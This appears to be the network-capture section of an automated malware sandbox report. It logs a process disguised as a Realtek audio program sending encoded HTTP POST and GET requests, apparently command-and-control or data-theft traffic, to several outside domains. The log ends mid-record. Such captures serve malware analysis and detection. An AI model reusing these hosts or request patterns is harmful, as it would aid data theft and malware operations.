39 2f 2f 78 31 6d 62 34 32 [TRUNCATED] Data Ascii: KI7UaA4=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEOPWvevH4LDuEYFQXVlnRLqFtq6q12vnXCFKe/EOWyM/lhB3G8I1mj4JGwMcsa242ziuHQ8l7NXV1/srSkQg0uE8gXysZLfKud8wdTGXpF/dMw4ATI3slXbexc51PQAMoD7tiMqHvCg4bArI/AzeAIDh+LqT+9fOn8JJj8GwcBPtJJF5dQPVElLswqNH3Bz29jSsT9dKKPtYU75/G6dREHcUuROKuy5N8L3hrviVqkmYzNc5nImTpe9E31bt7Tx33jxH4Mq15dZZnh1sDKAU/qxta9//x1mb42EkWVSJA06i8ScOajKfGK1AYUShhK3+yId9w+NvpHPIEB3aXyF4lFM5hgpiY44fk7k80gp60CJg3pTHamkIH7RFU8tvXVT2Qr/H+W82+smk4+EZd++iezl/M+vWzFqHB2SW658ywutjTBnI/JM5nk+RwysxmN2EJx7uM1jnqQfxrG07+NtlbWuCxsYJ8GIv07FO8k1oGuZFmUhGicoJb0YK64ADvKo+DLjjfhPJSeI9SEPdb9B6I4gcl3i+Tuu2Vj2+DkUt8KsJ03r2L9qu/giyS49hCFIHOig60++mpatfIc4jQuFGP4Jzdg8pxnmlNxP2YrPA50G5lodqR8+TErEhjMIj67yO+M7WlVw9wgAbdwqy49o/XIPTWpBCUvIeBiD0kBw0QiyxnlGrgxNtQxBJEcZ5WZGBTX12
Jan 7, 2025 10:09:23.485896111 CET	6616	OUT	Data Raw: 55 52 75 69 70 36 44 37 61 50 71 64 78 73 37 43 2f 4a 51 4e 35 30 62 4f 73 33 4c 75 63 70 39 74 30 35 50 70 31 2b 50 31 64 39 61 43 4b 41 61 4a 68 4f 32 55 49 47 71 57 44 4d 33 38 30 7a 31 51 6e 63 6a 4d 37 46 6d 46 74 33 6b 69 5a 76 56 4c 5a 50 Data Ascii: URuip6D7aPqdxs7C/JQN50bOs3Lucp9t05Pp1+P1d9aCKAaJhO2UIGqWDM380z1QncjM7FmFt3kiZvVLZPSa0euZAooH4UZrC6DooM/gRLzGkjc+nzfYIXZgxAanLLN6KcN/2UcUV+MGkXsUHzj7LDa3mYTo32Huh/iPnVzJ7ap5ynhXeEkSxtLq1br4LQQ2zceXCQuqi8fJUWnhNq4X+QRtDf9LdpA8WgXrGVzpHqva+JD6svt
Jan 7, 2025 10:09:23.836843967 CET	1083	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 09:09:23 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IVAXGeBlSRGGef%2FxMpCUo1thRVYy275idAVnQ9xwfhNgQT1A2oXgCVO3rveoaZFaH76xVRjNFfqeEDTvE37yc%2BQH7nBJkmhu6otrb1GHlvdg2yUltKf249htZ0zC0w8o3Gi0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe2cf062a2313f9-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=119522&min_rtt=119522&rtt_var=59761&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7905&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U
Jan 7, 2025 10:09:23.836857080 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49755	104.21.18.171	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:26.140533924 CET	470	OUT	GET /kxtt/?KHKq=K3iyk&KI7UaA4=eC1oD4IhFSd/6jtM+gdYzJfxG74p9Bu5zKGW4KqWLMPitrzcqar0FZdKX10RVuOt75j4smH0EDZzb9gyazsXkw0DXdBvphotLgIy0LjdzSrSQl898rKd/4Q= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.grimbo.boats Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Jan 7, 2025 10:09:26.488563061 CET	1108	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 09:09:26 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BVt7Dmc72MVsQTE5awLFye06ZagVOdwGy3NtyxvmA3D3nlr6DT4HyivcpmajYJ%2FcLSFqDh%2Fg5mWwTRxEbcmbWjBG6ndDoJC%2Bff6604otIS2M%2BoIUb7swxdgvnCOv%2Fvrj%2ByO8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe2cf16cd8f2237-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=119718&min_rtt=119718&rtt_var=59859&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=470&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>
Jan 7, 2025 10:09:26.488573074 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49756	134.122.135.48	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:32.788085938 CET	733	OUT	POST /a59t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.44756.pizza Origin: http://www.44756.pizza Cache-Control: max-age=0 Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.44756.pizza/a59t/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 68 70 70 78 36 37 6c 37 6a 35 66 67 30 63 62 6f 45 6f 4e 4e 6a 62 77 67 67 56 4f 4f 49 69 78 41 49 32 34 5a 34 51 62 4b 68 77 67 45 56 6d 50 44 7a 4a 4d 63 38 65 37 2f 46 6e 58 4b 4d 30 70 35 4c 45 70 68 36 36 51 70 76 75 75 61 69 62 75 61 46 56 70 56 48 72 76 52 47 45 57 42 62 31 78 6e 64 52 58 64 6a 64 45 78 67 4e 70 6d 74 6f 39 4b 2b 63 41 73 42 47 50 47 47 5a 6f 31 47 71 50 4f 4b 4c 56 68 39 62 35 55 45 61 56 5a 4a 6b 4f 4e 73 33 56 6f 43 38 4f 2f 4e 39 73 52 37 52 42 6d 79 46 57 34 64 58 75 6d 62 37 43 6c 6d 49 61 79 52 75 58 42 41 3d 3d Data Ascii: KI7UaA4=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VoC8O/N9sR7RBmyFW4dXumb7ClmIayRuXBA==
Jan 7, 2025 10:09:33.089441061 CET	312	IN	HTTP/1.1 404 Not Found Content-Length: 148 Content-Type: text/html Date: Tue, 07 Jan 2025 09:09:32 GMT Etag: "6743f11f-94" Server: nginx Connection: close Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49757	134.122.135.48	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:35.614120007 CET	753	OUT	POST /a59t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.44756.pizza Origin: http://www.44756.pizza Cache-Control: max-age=0 Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.44756.pizza/a59t/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 37 57 78 44 6f 47 34 59 35 51 62 5a 52 77 67 4d 31 6d 47 65 6a 4a 54 63 38 53 56 2f 45 62 58 4b 4d 67 70 35 4c 30 70 68 4a 43 54 70 2f 75 67 42 79 62 6f 51 6c 56 70 56 48 72 76 52 48 68 37 42 59 46 78 6e 4a 56 58 63 42 35 48 79 67 4d 62 75 4e 6f 39 63 4f 63 63 73 42 47 68 47 48 31 47 31 46 53 50 4f 4c 37 56 68 76 7a 36 64 45 61 58 55 70 6c 4a 46 4d 75 4a 68 6d 51 2f 7a 71 6c 66 58 37 56 64 6e 6b 49 4d 6c 76 6a 4b 6c 49 6e 77 68 57 78 79 77 54 76 4d 63 4f 32 63 71 33 43 34 66 42 31 30 62 48 37 73 62 6d 65 62 6d 50 59 3d Data Ascii: KI7UaA4=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlInwhWxywTvMcO2cq3C4fB10bH7sbmebmPY=
Jan 7, 2025 10:09:35.916320086 CET	312	IN	HTTP/1.1 404 Not Found Content-Length: 148 Content-Type: text/html Date: Tue, 07 Jan 2025 09:09:35 GMT Etag: "6743f11f-94" Server: nginx Connection: close Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49758	134.122.135.48	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:38.439614058 CET	1289	OUT	POST /a59t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.44756.pizza Origin: http://www.44756.pizza Cache-Control: max-age=0 Content-Length: 7372 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.44756.pizza/a59t/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 36 75 78 41 61 4f 34 5a 65 38 62 61 52 77 67 43 56 6d 4c 65 6a 4a 61 63 2f 69 5a 2f 45 57 67 4b 50 59 70 34 6f 38 70 6e 34 43 54 69 2f 75 67 65 69 62 74 61 46 56 5a 56 48 37 6a 52 48 78 37 42 59 46 78 6e 50 35 58 4d 6a 64 48 30 67 4e 70 6d 74 6f 4c 4b 2b 63 67 73 42 65 58 47 48 42 34 31 55 79 50 4f 72 72 56 67 63 62 36 57 45 61 52 56 70 6c 72 46 4d 53 67 68 69 49 5a 7a 75 73 79 58 34 46 64 6c 52 78 55 78 2b 48 67 35 70 54 74 6b 56 67 50 77 6a 47 64 58 38 32 6f 6d 58 36 73 65 58 78 55 5a 57 54 2b 43 30 6a 52 2f 35 35 74 34 55 38 41 6a 51 5a 2f 4e 73 62 56 73 4f 53 62 44 4a 73 6d 2b 45 56 56 30 50 73 35 76 65 61 52 45 63 36 35 6a 55 56 77 33 52 5a 49 2f 69 58 52 70 31 37 74 59 2f 61 6e 49 73 63 41 6e 45 50 62 4b 4a 75 2b 6f 6c 6a 4f 57 38 71 63 5a 71 6b 45 59 75 34 4d 34 49 34 76 73 54 41 73 58 6c 78 33 6d 76 47 30 4b 31 68 69 4b 52 37 72 41 71 4a 75 5a 33 [TRUNCATED] Data Ascii: KI7UaA4=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO6uxAaO4Ze8baRwgCVmLejJac/iZ/EWgKPYp4o8pn4CTi/ugeibtaFVZVH7jRHx7BYFxnP5XMjdH0gNpmtoLK+cgsBeXGHB41UyPOrrVgcb6WEaRVplrFMSghiIZzusyX4FdlRxUx+Hg5pTtkVgPwjGdX82omX6seXxUZWT+C0jR/55t4U8AjQZ/NsbVsOSbDJsm+EVV0Ps5veaREc65jUVw3RZI/iXRp17tY/anIscAnEPbKJu+oljOW8qcZqkEYu4M4I4vsTAsXlx3mvG0K1hiKR7rAqJuZ36jeTMh+eJGnnOAQGuJUAmKrHDBPzbyNlopwleEFcsqZvMIrXTbn90LaUySuz6tmn3PSOpQug+Ez+pO1IrjPlMVj7KJjS9n2ZsOsk7g65VLLLo9T+WUYWg/2V9dE5Cnr8zLf86dooLwDporsS43A6qa72GWT6z9iKd4X0h2kFnbnJ2fo5ohbqt4e7Y5LYk8MS8Lmn07uJxqbMgAywE2KZg57QPgrdUq4nI8N2034Jz7OLJj5XI9ImWsxkvSA3tQRx1Y6D/HG8S3NkNihtax82yi+C5Keecb59j5Uw+e4I+oOYtjbI0Fu8uAYjCrLWeU565d4ug1sU81djX15ED9A02Rpr4PMehsX05m4fjbPEjjxb6vSQ96Ggn0Gg6bVeWOJAF8p35dm9iYRhKtllKqQdeBKZVFxNrnZWqcOAX
Jan 7, 2025 10:09:38.439660072 CET	1289	OUT	Data Raw: 4c 4f 4d 4a 62 72 70 53 2b 52 4d 79 4a 56 37 30 45 34 36 43 62 59 63 50 36 62 4e 70 63 65 6f 58 59 64 77 53 48 45 54 66 71 78 38 4f 50 57 51 42 51 6c 76 7a 78 53 37 36 55 64 45 6e 5a 4f 2b 72 7a 68 71 37 63 79 4b 59 48 36 34 75 38 38 38 4a 6c 4e Data Ascii: LOMJbrpS+RMyJV70E46CbYcP6bNpceoXYdwSHETfqx8OPWQBQlvzxS76UdEnZO+rzhq7cyKYH64u888JlNuwDC3TOOgbLBUIKCuTx+G/H3LXDsFbwLoRmRZAipWQLQm2HrcZL4v6QxlMjRvdk8abxSFpU2iez2Bdxb4g3utHWDnLSX1/DDfFj608mdgi91zWaKA49xZ/n61QmdkMRBCS8TevwPWXUKdtNgKEiltfhw1uN43vPUp
Jan 7, 2025 10:09:38.439749956 CET	5324	OUT	Data Raw: 7a 78 58 38 79 76 41 47 35 59 51 58 59 49 6c 67 73 74 50 4c 45 63 46 35 34 4c 50 2f 41 68 49 36 4f 32 57 58 44 63 63 44 4d 34 65 56 4b 43 31 62 59 4f 38 47 78 54 31 55 4d 44 54 41 61 67 49 33 2f 57 32 79 79 44 68 46 6c 4c 30 56 47 61 6b 2f 67 63 Data Ascii: zxX8yvAG5YQXYIlgstPLEcF54LP/AhI6O2WXDccDM4eVKC1bYO8GxT1UMDTAagI3/W2yyDhFlL0VGak/gc6YdJm0UPEuXfpcd67cGxEOt9EHX+1ZviJhefyreb+dScdCHQPZeJFImIHJorevhcPwta4QJAyMaJowCYuxZnKExFXsT+z+efeJZwnOelo89lAR1IzaQK/sX3R1mk2W+yryBP81EHeNg3GUBS3ID0naBhI+TRr3HXE
Jan 7, 2025 10:09:38.742069960 CET	312	IN	HTTP/1.1 404 Not Found Content-Length: 148 Content-Type: text/html Date: Tue, 07 Jan 2025 09:09:38 GMT Etag: "6743f11f-94" Server: nginx Connection: close Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49759	134.122.135.48	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:41.264713049 CET	469	OUT	GET /a59t/?KI7UaA4=4xL6Q7DrxWj99jxey6rPnDV/q35G5BtjNwylhh0vBKzMCs+5V4gzFQEJFVb3bklsevH6tDeLKuQQ/YMUh7acruyVDzvneyJjblLgAmd8GM83k8VjUDwd43s=&KHKq=K3iyk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.44756.pizza Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Jan 7, 2025 10:09:41.563539982 CET	312	IN	HTTP/1.1 404 Not Found Content-Length: 148 Content-Type: text/html Date: Tue, 07 Jan 2025 09:09:41 GMT Etag: "6743f11f-94" Server: nginx Connection: close Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49760	199.192.21.169	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:46.921082020 CET	742	OUT	POST /bowc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.lonfor.website Origin: http://www.lonfor.website Cache-Control: max-age=0 Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.lonfor.website/bowc/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 32 52 33 7a 4d 6c 6e 6a 59 46 6c 72 4e 75 54 7a 59 4d 4b 68 71 66 4e 4a 46 46 6b 31 4c 56 54 47 68 48 6c 55 68 56 59 35 77 31 41 51 65 59 78 38 35 57 4f 49 78 4d 4e 43 4e 64 6f 36 35 61 59 6d 52 6f 47 6a 73 44 6d 38 4d 56 30 63 63 58 43 5a 4e 4d 65 77 2f 41 58 4d 4e 53 78 42 66 67 61 74 50 34 75 50 54 59 47 7a 38 49 6e 69 4c 41 70 48 31 4d 6f 68 73 58 61 49 68 42 61 4b 4a 46 59 2f 6c 59 4f 36 4c 65 62 44 78 77 34 7a 30 6d 45 48 69 73 41 50 71 2b 4d 65 47 54 6e 51 41 52 65 65 2f 50 65 79 44 44 48 33 49 72 36 74 55 67 53 57 45 48 36 66 51 3d 3d Data Ascii: KI7UaA4=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAPq+MeGTnQARee/PeyDDH3Ir6tUgSWEH6fQ==
Jan 7, 2025 10:09:47.111891985 CET	918	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 09:09:47 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49761	199.192.21.169	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:49.626602888 CET	762	OUT	POST /bowc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.lonfor.website Origin: http://www.lonfor.website Cache-Control: max-age=0 Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.lonfor.website/bowc/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 78 54 48 41 33 6c 56 6c 68 59 30 51 31 41 46 75 59 77 2f 4a 57 2f 49 78 41 46 43 4d 68 6f 36 39 79 59 6d 51 59 47 69 62 2f 6c 39 63 56 79 4a 4d 58 41 58 74 4d 65 77 2f 41 58 4d 4a 44 35 42 66 34 61 74 2b 49 75 4f 78 38 4a 74 